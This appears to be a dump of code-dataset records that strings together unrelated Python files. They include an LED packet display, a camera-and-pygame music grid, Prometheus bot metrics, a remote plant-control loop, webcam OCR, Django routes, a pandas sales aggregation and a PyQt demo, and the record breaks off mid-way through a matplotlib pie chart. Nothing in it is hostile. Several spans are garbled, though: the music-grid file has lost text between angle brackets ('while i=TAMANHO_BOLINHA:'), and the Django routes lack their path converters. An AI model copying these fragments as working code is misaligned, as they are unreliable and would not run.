Anomaly\r\n# 2 Green LLDP\r\n# 3 Lime DNS\r\n# 4 Pink ICMP\r\n# 5 Cyan DHCP\r\n# 6 Purple ARP\r\n# 7 Orange IGMP\r\n# 8 Yellow UDP\r\n# 9 Blue TCP\r\nPACKETS = (WHITE, RED, GREEN, LIME, PINK, CYAN, PURPLE, ORANGE, YELLOW, BLUE)\r\n\r\nlight_up_sections(separator, 0, WHITE)\r\n\r\nwhile True:\r\n rxData = uart.readline()\r\n if rxData is not None:\r\n direction = int(rxData[0])\r\n color = int(rxData[1])\r\n if color >= 0 and color <= 9:\r\n light_up_sections(separator, direction, PACKETS[color])\r\n","repo_name":"yumekiti/illumi-packet_for_wifi","sub_path":"wifi.py","file_name":"wifi.py","file_ext":"py","file_size_in_byte":4327,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28575895487","text":"#BIBLIOTECAS\nimport tkinter as tk\nimport json\nimport pygame\nfrom pygame import mixer\nfrom threading import Timer\nimport time\nimport threading\nfrom serial import Serial\nfrom threading import Thread, Timer\nfrom time import sleep\nimport cv2\n\n#meu_serial = Serial(\"COM14\", baudrate=9600)\n\ndef matrizInv(m):\n mInv=[]\n i=0\n j=0\n while j<8:\n mInv.append([])\n while i<5:\n mInv[j].append(m[i][j])\n i+=1\n i=0\n j+=1\n return mInv\n\ndef matrizLuzes(mInv):\n mLuzes=[]\n i=0\n while i=TAMANHO_BOLINHA:\n coordx=(x-50)//50\n coordy=(y-50)//50\n if coordx<=7 and coordy<=4 and coordx>=0 and coordy>=0:\n cv2.rectangle(imagem,pt1=(x,y),pt2=(x+comprimento,y+altura),color=(240,250,70),thickness=2)\n #putText(imagem,(\"VERMELHO: Linha: \"+str(coordy+1)+\", Coluna: \"+str(coordx+1)),(20,30),color=(0,0,255),fontFace=FONT_HERSHEY_SIMPLEX,fontScale=1,thickness=4)\n #print(cor+\" - Linha: \"+str(coordy+1)+\", Coluna: \"+str(coordx+1))\n matriz[coordy][coordx]=cor\n #envio(matriz)\n\n # if atualizaLdeDic(matriz,lDic):\n # print(\"LALALALA\")\n # print(matriz)\n\n\n\n #desenhando tabuleiro\n i=0\n x1=50\n y1=50\n\n while i', time.time())\n\n\n#t1 = threading.Thread(target=roda_camera, args=('t1', 1))\nt1 = threading.Thread(target=roda_camera, args=())\n\nt1.start()\n#Abrindo o json\n\nwith open(\"Dadosescolhidos.json\", \"r\") as arquivo:\n data = json.load(arquivo)\n print(data)\n print(data['instrumentos']['box 1'])\n\n#MIXER\n\npygame.mixer.init(44100,-16,3,10)\npygame.mixer.set_num_channels(32)\n\n\n#AUDIOS\n\n#TROMPETE\n\ntdo=pygame.mixer.Sound(file='trom_Do.wav')\ntre=pygame.mixer.Sound(file='trom_Re.wav')\ntmi=pygame.mixer.Sound(file='trom_Mi.wav')\ntfa=pygame.mixer.Sound(file='trom_Fa.wav')\ntsol=pygame.mixer.Sound(file='trom_Sol.wav')\ntla=pygame.mixer.Sound(file='trom_La.wav')\ntsi=pygame.mixer.Sound(file='trom_Si.wav')\n\ntrompete={\"Dó\":tdo,\"Ré\":tre,\"Mi\":tmi,\"Fa\":tfa,\"Sol\":tsol,\"La\":tla,\"Si\":tsi}\n\n#DRUMS\n\nsnare=pygame.mixer.Sound(file='snare.wav')\nkick=pygame.mixer.Sound(file='kick.wav')\nhihat=pygame.mixer.Sound(file='hi-hat.wav')\nclap=pygame.mixer.Sound(file='clap.wav')\nsino=pygame.mixer.Sound(file='sino.wav')\nmoresnare=pygame.mixer.Sound(file='moresnare.wav')\ntriangulo=moresnare=pygame.mixer.Sound(file='triangulo.wav')\n\ndrums={\"Dó\":snare,\"Ré\":kick,\"Mi\":hihat,\"Fa\":clap,\"Sol\":sino,\"La\":moresnare,\"Si\":triangulo}\n\n#BAIXO\n\nsoundb1=pygame.mixer.Sound(file='baixo1.wav')\nb1raw_array_ = soundb1.get_raw()\nsoundb2=pygame.mixer.Sound(file='baixo2.wav')\nb2raw_array_ = soundb2.get_raw()\nsoundb3=pygame.mixer.Sound(file='baixo3.wav')\nb3raw_array_ = soundb3.get_raw()\n\nbaixo={\"Dó\":b1raw_array_[6350000:6500000],\n \"Ré\":b2raw_array_[6350000:6500000],\n \"Mi\":b3raw_array_[9350000:9500000],\n \"Fa\":b1raw_array_[9600000:9750000],\n \"Sol\":b2raw_array_[9600000:9750000],\n \"La\":b2raw_array_[4350000:4500000],\n \"Si\":b3raw_array_[6350000:6500000]}\n\n\n\n#VIOLÃO\n\nsoundv1=pygame.mixer.Sound(file='viola1.wav')\nv1raw_array_ = soundv1.get_raw()\nsoundv2=pygame.mixer.Sound(file='viola2.wav')\nv2raw_array_ = soundv2.get_raw()\nsoundv3=pygame.mixer.Sound(file='viola3.wav')\nv3raw_array_ = soundv3.get_raw()\n\nviola={\"Dó\":v1raw_array_[6420000:6570000],\n \"Ré\":v3raw_array_[6270000:6420000],\n \"Mi\":v2raw_array_[6250000:6400000],\n \"Fa\":v1raw_array_[9600000:9750000],\n \"Sol\":v3raw_array_[9400000:9550000],\n \"La\":v1raw_array_[13420000:13570000],\n \"Si\":v2raw_array_[13420000:13570000]}\n\n# PIANO\n\nsoundp = pygame.mixer.Sound(file='escalamaior.wav')\npraw_array_ = soundp.get_raw()\npiano = {\"Dó\":praw_array_[100000:250000],\n \"Ré\":praw_array_[300000:450000],\n \"Mi\":praw_array_[450000:600000],\n \"Fa\":praw_array_[620000:770000],\n \"Sol\":praw_array_[800000:950000],\n \"La\":praw_array_[1000000:1150000],\n \"Si\":praw_array_[1150000:1300000]}\n\n\n\n#Interface coding\n\n#INSTRUMENTS\njanela = tk.Tk()\njanela.title(\"Projeto de Gridi\")\njanela.geometry(\"800x800\")\n\nescolha1 = tk.Label(janela, text=\"Escolha o instrumento:\")\nescolha1.place(x=20, y=5)\n\ninstrumento1 = tk.StringVar(value= data[\"instrumentos\"][\"box 1\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento1, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=55)\n\ninstrumento2 = tk.StringVar(value= data[\"instrumentos\"][\"box 2\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento2, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=105)\n\ninstrumento3 = tk.StringVar(value= data[\"instrumentos\"][\"box 3\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento3, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=155)\n\ninstrumento4 = tk.StringVar(value= data[\"instrumentos\"][\"box 4\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento4, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=205)\n\ninstrumento5 = tk.StringVar(value= data[\"instrumentos\"][\"box 5\"])\ncampo_instrumento = tk.OptionMenu(janela, instrumento5, \"(selecione)\", \"Violão\", \"Baixo\", \"Piano\", \"Bateria\", \"Trompete\")\n\ncampo_instrumento.config(width=10)\ncampo_instrumento.place(x=20, y=255)\n\nescolha2 = tk.Label(janela, text=\"Associe uma nota a cada cor!\")\nescolha2.place(x=300, y=5)\n\n\n#COLORS AND TONES\n\n#Vermelho\n\nvermelho = tk.Label(janela, bg = \"red\", text=\" \",)\nvermelho.place(x=300, y=55)\n\nnota = tk.StringVar(value= data[\"cores\"][\"Vermelho\"]) \ncampo_nota = tk.OptionMenu(janela, nota, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota.config(width=10)\ncampo_nota.place(x=350, y=55)\n\n#Azul\n\nazul = tk.Label(janela, bg = \"blue\", text=\" \",)\nazul.place(x=300, y=105)\n\nnota2 = tk.StringVar(value= data[\"cores\"][\"Azul\"]) \ncampo_nota2 = tk.OptionMenu(janela, nota2, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota2.config(width=10)\ncampo_nota2.place(x=350, y=105)\n\n#Roxo\n\nroxo = tk.Label(janela, bg = \"purple\", text=\" \",)\nroxo.place(x=300, y=155)\n\nnota3 = tk.StringVar(value= data[\"cores\"][\"Roxo\"]) \ncampo_nota3 = tk.OptionMenu(janela, nota3, \"(selecione)\",\"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota3.config(width=10)\ncampo_nota3.place(x=350, y=155)\n\n#Verde\n\nverde = tk.Label(janela, bg = \"green\", text=\" \",)\nverde.place(x=300, y=205)\n\nnota4 = tk.StringVar(value= data[\"cores\"][\"Verde\"]) \ncampo_nota4 = tk.OptionMenu(janela, nota4, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota4.config(width=10)\ncampo_nota4.place(x=350, y=205)\n\n#Amarelo\n\namarelo = tk.Label(janela, bg = \"yellow\", text=\" \",)\namarelo.place(x=300, y=255)\n\nnota5 = tk.StringVar(value= data[\"cores\"][\"Amarelo\"]) \ncampo_nota5 = tk.OptionMenu(janela, nota5, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota5.config(width=10)\ncampo_nota5.place(x=350, y=255)\n\n#Rosa\n\nrosa = tk.Label(janela, bg = \"pink\", text=\" \")\nrosa.place(x=300, y= 305)\n\nnota6 = tk.StringVar(value= data[\"cores\"][\"Rosa\"]) \ncampo_nota6 = tk.OptionMenu(janela, nota6, \"(selecione)\",\"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota6.config(width=10)\ncampo_nota6.place(x=350, y=305)\n\n#Preto\n\npreto = tk.Label(janela, bg = \"black\", text=\" \")\npreto.place(x= 300, y= 355)\n\nnota7 = tk.StringVar(value= data[\"cores\"][\"Preto\"]) \ncampo_nota7 = tk.OptionMenu(janela, nota7, \"(selecione)\", \"do\", \"re\", \"mi\", \"fa\", \"sol\", \"la\", \"si\")\ncampo_nota7.config(width=10)\ncampo_nota7.place(x=350, y=355)\n\n#LISTAS\ninstrumentos = [instrumento1, instrumento2, instrumento3, instrumento4, instrumento5]\nnotas = {\"Vermelho\": nota, \"Azul\": nota2, \"Roxo\": nota3, \"Verde\": nota4, \"Amarelo\": nota5, \"Rosa\": nota6, \"Preto\": nota7}\n#notas = data[cores].get()\n\n#Botoes Velocidade\ndef velocidadeatual(novovalor):\n global vel\n vel = float(novovalor)\n\n\nglobal vel\nvel = 0.2\nvelocidade = tk.DoubleVar(value = data[\"Velocidades\"][\"Velocidade\"])\nvel = velocidade.get()\nscale = tk.Scale(janela, from_=0.2, to=1, resolution=0.2, command = velocidadeatual)\nscale.place(x=550, y=80)\nl1 = tk.Label(janela, text= \"Velocidade:\")\nl1.place(x=550, y= 50)\n\n\n\n\n#Desenho com matriz\n'''\ngridi = tk.Canvas(janela, bg=\"blue\", height=600, width=200)\ncoord = 10, 50, 240, 210\noval = gridi.create_polygon(200, 600, 700, 600, 700, 900, 200, 900)\n'''\n\n\n\n#SAVING CHOSEN DATA\n\ndef salvar_dados():\n print(\"\\n*** Escolhas selecionadas pelo usuário.***\")\n print(\"Nota p/ vermelho:\", nota.get())\n print(\"Nota p/ azul:\", nota2.get())\n print(\"Nota p/ roxo:\", nota3.get())\n print(\"Nota p/ verde:\", nota4.get())\n print(\"Nota p/ amarelo:\", nota5.get())\n print(\"Nota p/ rosa:\", nota6.get())\n print(\"Nota p/ preto:\", nota7.get())\n\n json_dados={\n\n \"instrumentos\": {\n \"box 1\": instrumento1.get(), \"box 2\" : instrumento2.get(), \"box 3\": instrumento3.get(), \"box 4\": instrumento4.get(), \"box 5\": instrumento5.get(),\n },\n \"cores\":\n {\n \"Vermelho\": nota.get(), \"Azul\": nota2.get(), \"Roxo\" : nota3.get(), \"Verde\": nota4.get(), \"Amarelo\": nota5.get(), \"Rosa\": nota6.get(),\"Preto\":nota7.get()\n },\n \"Velocidades\":\n {\n \"Velocidade\": vel#.get()\n }\n }\n\n with open(\"Dadosescolhidos.json\", \"w\") as arquivo:\n json.dump(json_dados, arquivo) \n\nbotao_dados = tk.Button(janela, text=\"Salvar Dados\", command=salvar_dados)\nbotao_dados.place(x=550, y=205)\n\n#GLOBAIS\n\nglobal cont\ncont=0\n\nglobal timer\ntimer = None\n\nglobal bpm\nbpm= 0.35\n\nglobal envio_sons_finais\nenvio_sons_finais = []\n\n\n#Envio JSON\n\ndef escolhas_definidas():\n global envio_sons_finais\n envio_sons_finais=[]\n\n for i in range(0,len(matriz)):\n cores_na_linha = matriz[i]\n lista_de_notas = []\n\n for cor in cores_na_linha:\n if cor != None:\n lista_de_notas.append(notas[cor].get())\n else:\n lista_de_notas.append(None)\n\n\n dicionario = {\n \"instrumento\": instrumentos[i].get(),\n \"notas\": lista_de_notas\n }\n\n envio_sons_finais.append(dicionario)\n\n print(envio_sons_finais)\n return \n\n\n#Botao Envio\n\nbotao_escolhas = tk.Button(janela, text=\"Enviar dados\", command=escolhas_definidas)\nbotao_escolhas.place(x=550, y=260)\n\ns_biblioteca={\"Trompete\":trompete,\"Bateria\":drums,\"Baixo\":baixo,\"Violão\":viola,\"Piano\":piano}\n\n\n#PLAY\ndef play():\n global envio_sons_finais\n global cont\n\n if cont >= 8:\n cont=0\n\n for i in range(len(envio_sons_finais)):\n dicionario=envio_sons_finais[i]\n\n if dicionario[\"instrumento\"] != \"(selecione)\":\n\n s_som=s_biblioteca[dicionario[\"instrumento\"]]\n if dicionario[\"notas\"][cont]:\n\n recurso_de_nota=s_som[dicionario[\"notas\"][cont]]\n\n if isinstance(recurso_de_nota,pygame.mixer.Sound) == True:\n toca_inst=s_som[dicionario[\"notas\"][cont]]\n toca_inst.play()\n else:\n nota=s_som[dicionario[\"notas\"][cont]]\n toca_inst=pygame.mixer.Sound(buffer=nota)\n toca_inst.play()\n cont+=1\n\n global timer \n timer= Timer(vel, play)\n timer.start()\n\n\n\n# Carolina converteu a matriz de cores para uma estrura como essa abaixo\n\n# [\n# {'instrumento': 'Piano', 'notas': ['Dó', None, 'Fá', None, None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': [None, 'Si', None, None, None, None, None, None]},\n# {'instrumento': 'Baixo', 'notas': [None, None, 'Ré', None, None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': [None, None, None, '(selecione)', None, None, None, None]},\n# {'instrumento': '(selecione)', 'notas': ['Fá', '(selecione)', None, None, None, None, None, None]}\n# ]\n\n#Botao Play\nbotaoplay = tk.Button(janela, text=\"PLAY\", command= play)\nbotaoplay.place(x=640, y=305)\n\n\n#STOP\n\n\ndef stop():\n global timer\n if timer != None:\n timer.cancel()\n timer=None\n\n# Botao Pausa\nbotaostop = tk.Button(janela, text=\"STOP\", command= stop)\nbotaostop.place(x=560, y=305)\n\n# #Execução\n# cores_detectadas = [\n# [\"Vermelho\",None,\"Azul\",None,None,None,None,None],\n# [None,\"Vermelho\",None,None,None,None,None,None],\n# [None,None,\"Vermelho\",None,None,None,None,None],\n# [None,None,None,\"Vermelho\",None,None,None,None],\n# [\"Vermelho\",\"Vermelho\",None,None,None,None,None,None],\n# ]\n\n\n# Canvas\ngrade = tk.Label(janela, text=\"Grade Virtual:\")\ngrade.place(x=20, y=480)\n\nmyCanvas = tk.Canvas(janela, bg=\"white\", height=500, width=500)\n\nmyCanvas.place(x=20, y=500)\n\ndef carol():\n print(\"carol\")\n for i in range(len(matriz)):\n for j in range(len(matriz[0])):\n x = j * 30 + 30\n y = i * 30 +30\n if matriz[i][j] == \"Vermelho\":\n cor = \"red\"\n elif matriz[i][j] == \"Verde\":\n cor = \"green\"\n elif matriz[i][j] == \"Azul\":\n cor = \"blue\"\n elif matriz[i][j] == \"Roxo\":\n cor = \"purple\"\n elif matriz[i][j] == \"Laranja\":\n cor = \"orange\"\n elif matriz[i][j] == \"Rosa\":\n cor = \"pink\"\n elif matriz[i][j] == \"Preto\":\n cor = \"black\"\n elif matriz[i][j] == None:\n cor = \"white\"\n\n\n myCanvas.create_oval(x,y,x+10,y+10, fill = cor)\n \n janela.after(100, carol)\n\ncarol()\n\n'''\nmyCanvas = tk.Canvas(janela, bg=\"white\", height=100, width=100)\ncoord = 20, 20, 50, 50\nbola = myCanvas.create_oval(coord, start=0, extent=359, fill=\"pink\")\n\nmyCanvas.place(x=20, y=500)\njanela.mainloop()\n'''\n","repo_name":"mmagagnin/trab-final-micro","sub_path":"ENTREGA FINAL/FINAL FINAL MESMO PARA ENTREGAR.py","file_name":"FINAL FINAL MESMO PARA ENTREGAR.py","file_ext":"py","file_size_in_byte":18975,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"22308050272","text":"from prometheus_client import Counter, Gauge, Histogram, Info, Summary\n\nBUCKETS = (1, 1.5, 3, 5, 10, 30, 1 * 60, 2 * 60, 5 * 60, 10 * 60, 15 * 60, float(\"inf\"))\nslash_labels = [\n \"base_name\",\n \"group_name\",\n \"command_name\",\n \"command_id\",\n \"guild_id\",\n \"guild_name\",\n \"dm\",\n \"user_id\",\n]\n\n# nafftrack stats\nlib_info = Info(\"naff\", \"Basic info about naff library\")\nbot_info = Info(\"naff_bot\", \"Basic attributes of the running bot\")\nlatency_gauge = Gauge(\"naff_bot_latency\", \"Latency of the websocket connection\")\n\ncache_gauge = Gauge(\"naff_cache_count\", \"Amount of objects in internal caches\", labelnames=[\"name\"])\ncache_limits_soft = Gauge(\"naff_cache_soft_limits\", \"Soft limits on the caches\", labelnames=[\"name\"])\ncache_limits_hard = Gauge(\"naff_cache_hard_limits\", \"Hard limits on the caches\", labelnames=[\"name\"])\n\n\nmessages_counter = Counter(\n \"naff_received_messages\",\n \"Amount of received messages\",\n labelnames=[\"guild_id\", \"guild_name\", \"channel_id\", \"channel_name\", \"dm\", \"user_id\"],\n)\n\nguilds_gauge = Gauge(\"naff_guilds\", \"Amount of guilds this bot is in\")\nchannels_gauge = Gauge(\"naff_channels\", \"Amount of channels this bot is in\", labelnames=[\"guild_id\", \"guild_name\"])\nmembers_gauge = Gauge(\"naff_members\", \"Amount of members this bot can see\", labelnames=[\"guild_id\", \"guild_name\"])\n\ninteractions_sync = Summary(\"naff_interactions_sync\", \"Amount of syncs and time spent syncing interactions\")\n\nslash_commands_perf = Histogram(\n \"naff_slash_command_perf\",\n \"Amount of calls and the time of execution of the command\",\n labelnames=slash_labels,\n buckets=BUCKETS,\n)\n\nslash_commands_running = Gauge(\n \"naff_slash_command_running\",\n \"Amount of concurrently running slash command callbacks\",\n labelnames=slash_labels,\n)\n\nslash_command_errors = Counter(\n \"naff_slash_command_errors\",\n \"Amount of errors experienced in the bot\",\n labelnames=slash_labels,\n)\n\n# own stats\nelevator_version_info = Info(\"elevator_version\", \"Version of Elevator\")\n\nstart_time_info = Info(\"naff_bot_start_time\", \"Start Time\")\n\ninteractions_registered_global = Gauge(\n \"naff_global_interactions_registered\", \"Amount of globally registered application commands\"\n)\ninteractions_registered_descend = Gauge(\n \"naff_descend_interactions_registered\", \"Amount of descend only registered application commands\"\n)\n\ndescend_voice_channel_activity = Histogram(\n \"naff_descend_voice_channel_activity\",\n \"How long users are in voice channels\",\n labelnames=[\"channel_id\", \"channel_name\", \"user_id\"],\n buckets=BUCKETS,\n)\n","repo_name":"TheDescend/elevatorbot","sub_path":"ElevatorBot/prometheus/stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2569,"program_lang":"python","lang":"en","doc_type":"code","stars":10,"dataset":"github-code","pt":"53"} +{"seq_id":"71504767209","text":"import new_models.server_handler as sh\nimport time\nfrom models.User import User\n\nserver_handler = sh.ServerHandler(client_type=\"user\")\n\nmes = (\"start_remote_control\", \"test_plant\")\nprint(server_handler.send_and_receive(mes))\n\n\n\"\"\"\n {\n \"display_text\": self.set_text_display,\n \"led_ring\": self.set_led_ring,\n \"get_moisture\": self.get_moisture,\n \"get_light_level\": self.get_light_level,\n \"add_water\": self.add_water,\n }\n\"\"\"\n\n\np = \"A\"\nwhile True:\n\n ac = input(\"1=turn pump | 2=get light lvls | 3=turn led ring: \")\n\n if ac == \"1\":\n m = input(\">> Duration: \")\n mes = (\"remote_action\", (\"add_water\", (p, m))) # (type of action, (details))\n print(server_handler.send_and_receive(mes))\n elif ac == \"2\":\n mes = (\"remote_action\", (\"get_light_level\", (p))) # (type of action, (details))\n print(server_handler.send_and_receive(mes, data_rec=True))\n\n elif ac == \"3\":\n m = input(\">> 1=on | 2=off: \")\n mes = (\"remote_action\", (\"led_ring\", (p, True if m == \"1\" else False))) # (type of action, (details))\n print(server_handler.send_and_receive(mes))\n\n\n elif ac == \"4\":\n u = User(\"a\", \"doron\", \"pas\", \"emal\", \"admin\", [], True)\n mes = (\"sign_up_user\", u)\n server_handler.send_and_receive(mes, False)\n server_handler.set_id(u)\n\n\n\n time.sleep(2)\n print(\"\")\n\n","repo_name":"DoronMaor/MyGardenGenie","sub_path":"trash/_OLD/user_dir/user_loop.py","file_name":"user_loop.py","file_ext":"py","file_size_in_byte":1431,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"31192402043","text":"import cv2\nimport pytesseract\n\ncap = cv2.VideoCapture(0)\ncap.set(cv2.CAP_PROP_FPS, 24)\ncap.set(cv2.CAP_PROP_FRAME_WIDTH, 600)\ncap.set(cv2.CAP_PROP_FRAME_HEIGHT, 480)\n\nwhile True:\n ret, img = cap.read()\n cv2.imshow(\"camera\", img)\n if cv2.waitKey(10) == 27: # Клавиша Esc\n break\n str=pytesseract.image_to_string(img, lang='rus')\n if str:\n print(str)\n s=input('найден текст! Продолжить(1)')\n if s=='1':\n foud = input(\"Что найти? \")\n data = pytesseract.image_to_data(img, lang='rus')\n for i, el in enumerate(data.splitlines()):\n if i == 0:\n continue\n el = el.split()\n try:\n if (el[11] == foud):\n print(el[11])\n try:\n x, y, w, h = int(el[6]), int(el[7]), int(el[8]), int(el[9])\n cv2.rectangle(img, (x, y), (w + x, h + y), (0, 0, 255), 1)\n except IndexError:\n continue\n except IndexError:\n continue\n\n cv2.imshow('Result', img)\n cv2.waitKey(0)\n\n\ncap.release()\ncv2.destroyAllWindows()\n\n\n","repo_name":"Fyrazhka/Find-word-in-text","sub_path":"WebCamFind/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1276,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"19468545412","text":"from django.urls import path\nfrom . import views\n\n# urlpatterns=[\n# path(\"\",views.index,name=\"all-meetups\"),\n# path(\"/success\",views.confirm_registration,name=\"confirm-registration\"),\n# path(\"\",views.meetup_details,name=\"meetup-detail\")\n \n# ]\n\nurlpatterns = [\n path(\"reviews/\",views.index_page,name=\"index_page\"),\n path(\"reviews/post_review_page\",views.post_review_page,name=\"post_review_page\"),\n path(\"reviews/submit_post/\",views.submit_post,name=\"submit_post\"),\n path(\"reviews/single_course_review_page/\",views.single_course_review_page,name=\"single_course_review_page\"),\n path(\"reviews/review_of_single_course\",views.review_of_single_course,name=\"review_of_single_course\")\n]\n","repo_name":"amarbudhiraja/IIT-Bhilai-Course-Review","sub_path":"reviews/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":778,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30163162372","text":"import argparse\nimport pandas as pd\nimport numpy as np\nimport json\nimport glob\nfrom tqdm import tqdm\nimport natsort\nimport os\nimport logging\n\n# define logging configurations\nlogging.basicConfig(level = logging.DEBUG,\n format = '%(asctime)s:%(levelname)s:%(name)s:%(message)s')\n\ndef get_params() -> dict:\n parser = argparse.ArgumentParser(description='DataTest')\n parser.add_argument('--customers_location', required=False, default=\"./input_data/starter/customers.csv\")\n parser.add_argument('--products_location', required=False, default=\"./input_data/starter/products.csv\")\n parser.add_argument('--transactions_location', required=False, default=\"./input_data/starter/transactions/\")\n parser.add_argument('--output_location', required=False, default=\"./output_data/outputs/\")\n return vars(parser.parse_args())\n\ndef process_data(customers_location:str, products_location:str, transactions_location:str, output_location:str) -> None:\n # read the different data files\n products = pd.read_csv(products_location)\n customers = pd.read_csv(customers_location)\n transaction_files = glob.glob(os.path.join(transactions_location, \"*/transactions.json\"))\n\n logging.info(\"There are {} products, {} customers and {} transaction files\".format(products.shape[0], customers.shape[0], len(transaction_files)))\n\n # read and append to a list the dictionary of all transactions across different dates\n all_transactions = []\n for a_file in tqdm(transaction_files):\n one_file_data = open(a_file).read().split(\"\\n\")\n for trans in one_file_data:\n # in case the one_file_data is empty, pass\n try:\n trans_obj = json.loads(trans)\n all_transactions.append(trans_obj)\n except Exception as e:\n pass\n\n # convert the dictionary of transactions at customer level into a list of transactions at customer cross product level\n transactions_at_product_level = []\n for transaction in tqdm(all_transactions):\n customer_id = transaction['customer_id']\n date_of_purchase = transaction['date_of_purchase']\n for item in transaction['basket']:\n product_id = item['product_id']\n price = item['price']\n transactions_at_product_level.append([date_of_purchase, customer_id, product_id, price])\n\n # convert list of transactions into a pandas dataframe for easier processing\n transactions_at_product_level = pd.DataFrame(transactions_at_product_level, columns=['date_of_purchase', 'customer_id', 'product_id', 'price'])\n\n # get a count of transactions at user cross product level, sort first by customer_id and then product_id\n transactions_grouped_by_customer_id_and_product_id = transactions_at_product_level.groupby(['customer_id', 'product_id']).agg(purchase_count=('price', 'count')).reset_index().sort_values(by=[\"customer_id\", \"product_id\"], key=natsort.natsort_keygen())\n\n # make a left join with customers to get loyalty score\n transactions_grouped_by_customer_id_and_product_id_with_loyalty_score = transactions_grouped_by_customer_id_and_product_id.merge(customers, on='customer_id', how='left')\n\n # make a left join with products to get product category\n transactions_grouped_by_customer_id_and_product_id_with_loyalty_score_with_category = transactions_grouped_by_customer_id_and_product_id_with_loyalty_score.merge(products, on='product_id', how='left')\n final_results = transactions_grouped_by_customer_id_and_product_id_with_loyalty_score_with_category[['customer_id', 'loyalty_score', 'product_id', 'product_category', 'purchase_count']]\n\n # if output directory does not exist, create it\n if not os.path.isdir(output_location):\n os.makedirs(output_location)\n dest_path = os.path.join(output_location, \"final.csv\")\n\n # write the dataframe to the destination as a csv file\n final_results.to_csv(dest_path, index=None)\n\ndef main():\n # get command line arguments \n params = get_params()\n\n # call custom function to process data\n process_data(params['customers_location'], params['products_location'], params['transactions_location'], params['output_location'])\n\nif __name__ == \"__main__\":\n main()\n\n# go to root folder (you should be able to see the solutions folder from the root folder)\n# run following command to generate the output, provide command line arguments if necessary\n# python solutions/custom_solution.py --customers_location ./starter/customers.csv --products_location ./starter/products.csv --transactions_location ./starter/transactions --output_location ./output_data/outputs/","repo_name":"adiosboy/Revolve_assignment","sub_path":"python-assignment-level2-6ed53b4e828af18bc24b1770a3a3e3e70706e785/solution/custom solution.py","file_name":"custom solution.py","file_ext":"py","file_size_in_byte":4636,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32699235192","text":"import random\nimport sys\n\nfrom PyQt5.QtGui import QPainter, QPen, QColor\nfrom PyQt5.QtWidgets import QApplication, QMainWindow, QPushButton\n\n\nclass FlagMaker(QMainWindow):\n def __init__(self):\n super().__init__()\n f = open(\"UI.ui\")\n self.generate = QPushButton(self)\n self.generate.setGeometry(400, 800, 100, 50)\n self.generate.setText(\"Generate\")\n self.setGeometry(0, 0, 1900, 1000)\n self.flag = False\n self.generate.clicked.connect(self.generateListener)\n\n def paintEvent(self, event):\n if self.flag:\n painter = QPainter(self)\n painter.setPen(QPen(QColor(random.randint(0, 255), random.randint(0, 255), random.randint(0, 255)), 10))\n rand = random.randint(50, 1000)\n painter.drawEllipse(100, 40, rand, rand)\n self.flag = False\n\n def generateListener(self):\n self.flag = True\n self.update()\n\nif __name__ == '__main__':\n app = QApplication(sys.argv)\n ex = FlagMaker()\n ex.show()\n sys.exit(app.exec_())\n","repo_name":"userAndrew2023/pluh-pluh","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"69973391207","text":"import matplotlib.pyplot as plt\nimport matplotlib\n\nmatplotlib.rcParams['font.sans-serif'] = ['SimHei']\nmatplotlib.rcParams['axes.unicode_minus'] = False\nlabel_list = [\"第一部分\", \"第二部分\", \"第三部分\", \"第四部分\"] # 各部分标签\nsize = [35, 25, 10,20] # 各部分大小\ncolor = [\"red\", \"green\", \"blue\",'yellow'] # 各部分颜色\nexplode = [0.05, 0, 0,0.02] # 各部分突出值\n\"\"\"\n绘制饼图\nexplode:设置各部分突出\nlabel:设置各部分标签\nlabeldistance:设置标签文本距圆心位置,1.1表示1.1倍半径\nautopct:设置圆里面文本\nshadow:设置是否有阴影\nstartangle:起始角度,默认从0开始逆时针转\npctdistance:设置圆内文本距圆心距离\n返回值\nl_text:圆内部文本,matplotlib.text.Text object\np_text:圆外部文本\n\"\"\"\npatches, l_text, p_text = plt.pie(size, explode=explode, colors=color, labels=label_list, labeldistance=1.1, autopct=\"%1.1f%%\", shadow=False, startangle=90, pctdistance=0.6)\nplt.axis(\"equal\") # 